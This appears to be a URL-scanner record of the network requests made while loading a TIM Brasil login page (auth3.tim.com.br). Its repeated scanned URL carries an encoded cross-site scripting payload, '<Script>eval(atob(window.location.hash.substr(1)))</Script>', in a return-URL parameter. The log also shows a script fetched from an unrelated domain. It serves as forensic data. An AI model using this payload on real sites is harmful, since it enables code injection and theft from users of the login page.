URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: c28f024df8df9c3553efca35b134d3bde558f9e5f85a3b052d581bef81c47c90

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:34 GMT
content-encoding: gzip
last-modified: Mon, 25 Nov 2019 18:36:55 GMT
server: Apache
x-cdn: Imperva
etag: "428d7-130-598300c411fc0"
content-type: application/javascript
x-iinfo: 3-3722192-3722205 NNYN CT(147 301 0) RT(1706823094077 60) q(0 0 4 -1) r(6 6) U24
x-incap-sess-cookie-hdr: rBYtT0hxCm55J7ZiyEXDErYNvGUAAAAANzhnlLM+nAI2rhkwqVyVJw==
accept-ranges: bytes

GET
H2 404 gtm.js
www.googletagmanager.com/ 0
0 235ms
49ms Script
text/html 2607:f8b0:4004:c17::61
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL: https://www.googletagmanager.com/gtm.js?id=GTM-XXXX
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2607:f8b0:4004:c17::61 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software: /
Resource Hash

Request headers

accept-language: en-US,en;q=0.9
Referer: http://auth3.tim.com.br/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

GET
H2 200 loading.gif
auth3.tim.com.br/OTP/imgs/ 22 KB
23 KB 187ms
187ms Image
image/gif 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://auth3.tim.com.br/OTP/imgs/loading.gif
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 3e75a6774ef7041083d556b2f83a816acdd398eff6add8c1867c0cea9ddf6d4b

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:35 GMT
last-modified: Wed, 31 Aug 2016 14:46:24 GMT
server: Apache
x-cdn: Imperva
etag: "f4856-5992-53b5f2946f000"
content-type: image/gif
x-iinfo: 3-3722192-3722203 PNNN RT(1706823094077 1233) q(0 0 0 0) r(1 1) U24
x-incap-sess-cookie-hdr: IZPpePfi7W1HK7ZiyEXDErcNvGUAAAAA7fTEcg8yjeoSuIYfiwb3Qg==
accept-ranges: bytes
content-length: 22930

GET header.aspx
wap.dindo.com.br/newMobile/auth/tim/ Frame B101 0
0

GET
H/1.1 200
OK temp.js Show response
topadvisitpro.pro/lion/222gdhj/ 9 KB
4 KB 121ms
121ms Script
application/javascript 45.90.56.13
GREENFLOID-AS

General

Check archive.org

Show headers Download Go to

Full URL: http://topadvisitpro.pro/lion/222gdhj/temp.js
Requested by: Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol: HTTP/1.1
Server: 45.90.56.13 Geneva, Switzerland, ASN204957 (GREENFLOID-AS, US),
Reverse DNS: mon-fri.gg
Software: Apache/2.4.38 (Debian) /
Resource Hash: f05e67abbb4c8036ae631ee4fc5a99428d5bad75fd8996dfb01c09ec6ade3a1b

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Date: Thu, 01 Feb 2024 21:31:36 GMT
Content-Encoding: gzip
Last-Modified: Tue, 19 Dec 2023 10:56:15 GMT
Server: Apache/2.4.38 (Debian)
ETag: "2599-60cdab7290029-gzip"
Vary: Accept-Encoding
Content-Type: application/javascript
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=99
Content-Length: 3248

GET
H/1.1 200
OK jokervr1-pt-doi-web Show response
www.timpromos.com.br/OTA-BRTIM-JOKER/ 175 KB
46 KB 823ms
589ms XHR
text/html 91.241.94.8
UPSTREAM-AS Greece

General

Check archive.org

Show headers Download Go to

Full URL

http://www.timpromos.com.br/OTA-BRTIM-JOKER/jokervr1-pt-doi-web?HEKeyword=OTA_MVR_HAF_1&utm_source=haf&utm_medium=cpa&utm_content=jokervr1&utm_campaign=OTA_MVR_HAF_1-haf-web-cpa-jokervr1-image&haf_id=65bc0db5c7064803455720a0&haf_pub=344

Requested by

Host: auth3.tim.com.br
URL: https://auth3.tim.com.br/OTP/js/jquery.min.js

Protocol

HTTP/1.1

Server

91.241.94.8 , Greece, ASN49582 (UPSTREAM-AS Greece, GR),

Reverse DNS

Software

Resource Hash

d79fb817a65fae18240ebc403be03abef91d8e7e32eb120f7e011817732199e0

Security Headers

Name	Value
Strict-Transport-Security	max-age=0; includeSubDomains

Request headers

Accept: */*
Referer
accept-language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Date: Thu, 01 Feb 2024 21:31:36 GMT
Content-Encoding: gzip
Via: 1.1 brtim1-varnish-5d85b7f48-6dnqh (Varnish/7.4)
Strict-Transport-Security: max-age=0; includeSubDomains
Age: 0
Vary: Accept-Encoding
X-Cache: MISS
X-Varnish: 218552912
Content-Type: text/html; charset=UTF-8
Access-Control-Allow-Origin: *
Cache-Control: no-cache, private
Transfer-Encoding: chunked
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=1000

GET
H2 200 TIM-Login-styles-sheet.css
auth3.tim.com.br/OTP/css/ Frame 6BC6 21 KB
3 KB 262ms
260ms Stylesheet
text/css 45.60.63.22
INCAPSULA

General

Check archive.org

Show headers Download Go to

Full URL: https://auth3.tim.com.br/OTP/css/TIM-Login-styles-sheet.css
Requested by: Host: auth3.tim.com.br
URL: https://auth3.tim.com.br/OTP/js/jquery.min.js
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software: Apache /
Resource Hash: 38b82be8dc970bd32e5651b51b46d5c5bdd81a1766c035bbe022f1d00ac09fce

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:38 GMT
content-encoding: gzip
last-modified: Thu, 04 May 2017 03:57:51 GMT
server: Apache
x-cdn: Imperva
etag: "f8065-539a-54eaac6d7edc0"
content-type: text/css
x-iinfo: 3-3722192-3722198 PNYN RT(1706823094077 4257) q(0 0 0 -1) r(2 2) U24
x-incap-sess-cookie-hdr: Hcc+PLhRHghHK7ZiyEXDEroNvGUAAAAA12EFXlo075LkhPp7S34e/g==
accept-ranges: bytes

GET
H/1.1 200
OK style.css
tim.jokeridea.com/vr/ Frame 6BC6 22 KB
4 KB 192ms
27ms Stylesheet
text/css 3.212.81.97
AMAZON-AES

General

Check archive.org

Show headers Download Go to

Full URL: https://tim.jokeridea.com/vr/style.css
Requested by: Host: auth3.tim.com.br
URL: https://auth3.tim.com.br/OTP/js/jquery.min.js
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_CBC
Server: 3.212.81.97 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS: ec2-3-212-81-97.compute-1.amazonaws.com
Software: Microsoft-IIS/8.5 / ASP.NET
Resource Hash: ee3c20e7ded1bd431ba00fb44c42a664de16c4052aeb9e5556ef74e29b6fcd7d

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Date: Thu, 01 Feb 2024 21:31:34 GMT
Content-Encoding: gzip
Last-Modified: Fri, 20 Apr 2018 20:25:43 GMT
Server: Microsoft-IIS/8.5
ETag: "807d89c1e5d8d31:0"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Type: text/css
Accept-Ranges: bytes
Content-Length: 3314

GET
H2 200 gtm.js Show response
www.googletagmanager.com/ 239 KB
85 KB 70ms
67ms Script
application/javascript 2607:f8b0:4004:c17::61
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagmanager.com/gtm.js?id=GTM-5R76V9F

Requested by

Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2607:f8b0:4004:c17::61 Washington, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Google Tag Manager /

Resource Hash

443b1c92b35ad6aa85dad25c602e8b4ccaeb38f7a5e048305e14cbeb2d57a571

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains
X-Xss-Protection	0

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:38 GMT
content-encoding: br
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 86569
x-xss-protection: 0
last-modified: Thu, 01 Feb 2024 21:00:00 GMT
server: Google Tag Manager
vary: Accept-Encoding
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: private, max-age=900
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
expires: Thu, 01 Feb 2024 21:31:38 GMT

GET
H/1.1 200
OK header.aspx Show response
tim.jokeridea.com/vr/ Frame 2690 896 B
1 KB 176ms
41ms Document
text/html 3.212.81.97
AMAZON-AES

General

Check archive.org

Show headers Download Go to

Full URL: https://tim.jokeridea.com/vr/header.aspx
Requested by: Host: auth3.tim.com.br
URL: https://auth3.tim.com.br/OTP/js/jquery.min.js
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_CBC
Server: 3.212.81.97 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS: ec2-3-212-81-97.compute-1.amazonaws.com
Software: Microsoft-IIS/8.5 / ASP.NET
Resource Hash: 31c3e5353a15096bdcdbc50ed832a1d2e0413e06ac73f7eadca7b98942a91f1e

Request headers

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36
accept-language: en-US,en;q=0.9

Response headers

Cache-Control: private
Content-Length: 896
Content-Type: text/html; charset=utf-8
Date: Thu, 01 Feb 2024 21:31:34 GMT
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET

GET
H/1.1 200
OK footer.aspx Show response
tim.jokeridea.com/vr/ Frame 5BBE 1003 B
1 KB 202ms
37ms Document
text/html 3.212.81.97
AMAZON-AES

General

Check archive.org

Show headers Download Go to

Full URL: https://tim.jokeridea.com/vr/footer.aspx
Requested by: Host: auth3.tim.com.br
URL: https://auth3.tim.com.br/OTP/js/jquery.min.js
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_CBC
Server: 3.212.81.97 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS: ec2-3-212-81-97.compute-1.amazonaws.com
Software: Microsoft-IIS/8.5 / ASP.NET
Resource Hash: 950070a58deedd49cfa5164e99c1b72ebf6b239f86dab6ea9bab8d7d86fc6068

Request headers

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36
accept-language: en-US,en;q=0.9

Response headers

Cache-Control: private
Content-Length: 1003
Content-Type: text/html; charset=utf-8
Date: Thu, 01 Feb 2024 21:31:34 GMT
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET

GET
H/1.1 200 AQ4z3kl7_-HNzShemJh3P9tfpWd00bQ-6BhQtfp7YMEkBxXzznvi1Vqb5vXxsmz7ZcYe
analytics-br-tim.securewebfraud.io/web/v1/content/view/Confirmation/br_tim/ Frame 6BC6 51 B
332 B 1021ms
329ms Image
image/gif 91.220.208.18
UPSTREAM-AS Greece

General

Check archive.org

Show headers Download Go to Show image

Full URL: http://analytics-br-tim.securewebfraud.io/web/v1/content/view/Confirmation/br_tim/AQ4z3kl7_-HNzShemJh3P9tfpWd00bQ-6BhQtfp7YMEkBxXzznvi1Vqb5vXxsmz7ZcYe
Protocol: HTTP/1.1
Server: 91.220.208.18 , Greece, ASN49582 (UPSTREAM-AS Greece, GR),
Reverse DNS
Software: /
Resource Hash: 7455bacb03f7ef04d79010638db14d8434cf7a349914c2ee99eb5d4220338675

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Pragma: no-cache
Date: Thu, 01 Feb 2024 21:31:38 GMT
Content-Type: image/gif
Cache-Control: no-store, private
Content-Disposition: attachment; filename="pixel"
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=2, max=1000
Content-Length: 51

GET
H/1.1 200 AQ4z3kl7_-HNzShemJh3P9tfpWd00bQ-6BhQtfp7YMEkBxXzznvi1Vqb5vXxsmz7ZcYe
www.timpromos.com.br/security-platform-web/web/v1/content/view/Confirmation/br_tim/ Frame 6BC6 51 B
501 B 309ms
303ms Image
image/gif 91.241.94.8
UPSTREAM-AS Greece

General

Check archive.org

Show headers Download Go to Show image

Full URL: http://www.timpromos.com.br/security-platform-web/web/v1/content/view/Confirmation/br_tim/AQ4z3kl7_-HNzShemJh3P9tfpWd00bQ-6BhQtfp7YMEkBxXzznvi1Vqb5vXxsmz7ZcYe
Protocol: HTTP/1.1
Server: 91.241.94.8 , Greece, ASN49582 (UPSTREAM-AS Greece, GR),
Reverse DNS
Software: /
Resource Hash: 7455bacb03f7ef04d79010638db14d8434cf7a349914c2ee99eb5d4220338675

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Pragma: no-cache
Date: Thu, 01 Feb 2024 21:31:38 GMT
Content-Type: image/gif
Cache-Control: no-store, private
Content-Disposition: attachment; filename="pixel"
Connection: Keep-Alive
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=1000
Content-Length: 51

GET
H3 200 destination Show response
www.googletagmanager.com/gtag/ 266 KB
90 KB 65ms
64ms Script
application/javascript 2607:f8b0:4004:c17::61
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagmanager.com/gtag/destination?id=G-6QFBLT1GP2&l=dataLayer&cx=c

Requested by

Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtm.js?id=GTM-5R76V9F

Protocol

Security

QUIC, , AES_128_GCM

Server

2607:f8b0:4004:c17::61 Washington, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Google Tag Manager /

Resource Hash

dc8505bc6acac0f02f10fbc0b55dfebed50dd5f51cb7c5b058ad0206ebe44f3e

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains
X-Xss-Protection	0

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:38 GMT
content-encoding: br
strict-transport-security: max-age=31536000; includeSubDomains
server: Google Tag Manager
vary: Accept-Encoding
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: private, max-age=900
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
access-control-allow-headers: Cache-Control
content-length: 91773
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
expires: Thu, 01 Feb 2024 21:31:38 GMT

GET
H3 200 js Show response
www.googletagmanager.com/gtag/ 266 KB
90 KB 65ms
64ms Script
application/javascript 2607:f8b0:4004:c17::61
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagmanager.com/gtag/js?id=G-6QFBLT1GP2&l=dataLayer&cx=c

Requested by

Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtm.js?id=GTM-5R76V9F

Protocol

Security

QUIC, , AES_128_GCM

Server

2607:f8b0:4004:c17::61 Washington, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Google Tag Manager /

Resource Hash

789beef363d46fed28af585825aaf01d6a83bbcacdc892b4fbd1719015f47a41

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains
X-Xss-Protection	0

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

date: Thu, 01 Feb 2024 21:31:38 GMT
content-encoding: br
strict-transport-security: max-age=31536000; includeSubDomains
server: Google Tag Manager
vary: Accept-Encoding
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: private, max-age=900
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
access-control-allow-headers: Cache-Control
content-length: 91772
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
expires: Thu, 01 Feb 2024 21:31:38 GMT

GET
H2 200 analytics.js Show response
www.google-analytics.com/ 52 KB
21 KB 196ms
44ms Script
text/javascript 2607:f8b0:4004:c06::8b
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/analytics.js

Requested by

Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtm.js?id=GTM-5R76V9F

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2607:f8b0:4004:c06::8b Washington, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

de36e50194320a7d3ef1ace9bd34a875a8bd458b253c061979dd628e9bf49afd

Security Headers

Name	Value
Strict-Transport-Security	max-age=10886400; includeSubDomains; preload
X-Content-Type-Options	nosniff

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

strict-transport-security: max-age=10886400; includeSubDomains; preload
content-encoding: gzip
x-content-type-options: nosniff
date: Thu, 01 Feb 2024 21:12:32 GMT
last-modified: Tue, 12 Dec 2023 18:09:08 GMT
server: Golfe2
age: 1146
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7200
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 20994
expires: Thu, 01 Feb 2024 23:12:32 GMT

GET
H/1.1 404
Not Found StyleSheet.css
tim.jokeridea.com/vr/ Frame 5BBE 0
0 35ms
32ms Stylesheet
text/html 3.212.81.97
AMAZON-AES

General

Check archive.org

Show headers Download Go to

Full URL: https://tim.jokeridea.com/vr/StyleSheet.css
Requested by: Host: tim.jokeridea.com
URL: https://tim.jokeridea.com/vr/footer.aspx
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_CBC
Server: 3.212.81.97 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS: ec2-3-212-81-97.compute-1.amazonaws.com
Software: Microsoft-IIS/8.5 / ASP.NET
Resource Hash

Request headers

accept-language: en-US,en;q=0.9
Referer: https://tim.jokeridea.com/vr/footer.aspx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Date: Thu, 01 Feb 2024 21:31:34 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1245
Content-Type: text/html

GET
H/1.1 404
Not Found Tim.png
tim.jokeridea.com/vr/ Frame 5BBE 1 KB
1 KB 36ms
33ms Image
text/html 3.212.81.97
AMAZON-AES

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://tim.jokeridea.com/vr/Tim.png
Requested by: Host: tim.jokeridea.com
URL: https://tim.jokeridea.com/vr/footer.aspx
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_CBC
Server: 3.212.81.97 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS: ec2-3-212-81-97.compute-1.amazonaws.com
Software: Microsoft-IIS/8.5 / ASP.NET
Resource Hash: dc1d54dab6ec8c00f70137927504e4f222c8395f10760b6beecfcfa94e08249f

Request headers

accept-language: en-US,en;q=0.9
Referer: https://tim.jokeridea.com/vr/footer.aspx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

Date: Thu, 01 Feb 2024 21:31:34 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1245
Content-Type: text/html

POST
H2 204 collect
analytics.google.com/g/ 0
54 B 699ms
45ms Ping
text/plain 2001:4860:4802:36::181
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL: https://analytics.google.com/g/collect?v=2&tid=G-6QFBLT1GP2&gtm=45je41v0v9100858906z8813537120za200&_p=1706823098583&_gaz=1&gcd=11l1l1l1l1&npa=0&dma=0&cid=1854977073.1706823099&ul=en-us&sr=1600x1200&pscdl=noapi&_s=1&sid=1706823098&sct=1&seg=0&dl=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading%3Fbmctx%3DD1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C%26contextType%3Dexternal%26username%3Dstring%26enablePersistentLogin%3Dtrue%26password%3Dsecure_string%26challenge_url%3Dhttp%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fheloading%26request_id%3D8407358969913691941%26authn_try_count%3D0%26locale%3Duk_UA%26resource_url%3Dhttps%25253A%25252F%25252Fauth3.tim.com.br%25252Fv3%25252Faccesscontrol-web%25252Fhe%25253Fclient_id%25253Db4da3e0624b94cbabb4d4c82b84b3012%252526csp%25253D751%252526appid%25253D11657%252526msisdn%25253D16982527516%252526redirect_uri%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252525252FNCN%252525252Fcallback%252525252Fpending%252526SecureSessionId%25253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%252526campaignReturnURL%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252522%25253E%2500%2500%2500%2500%2500%2500%2500%25253CScrip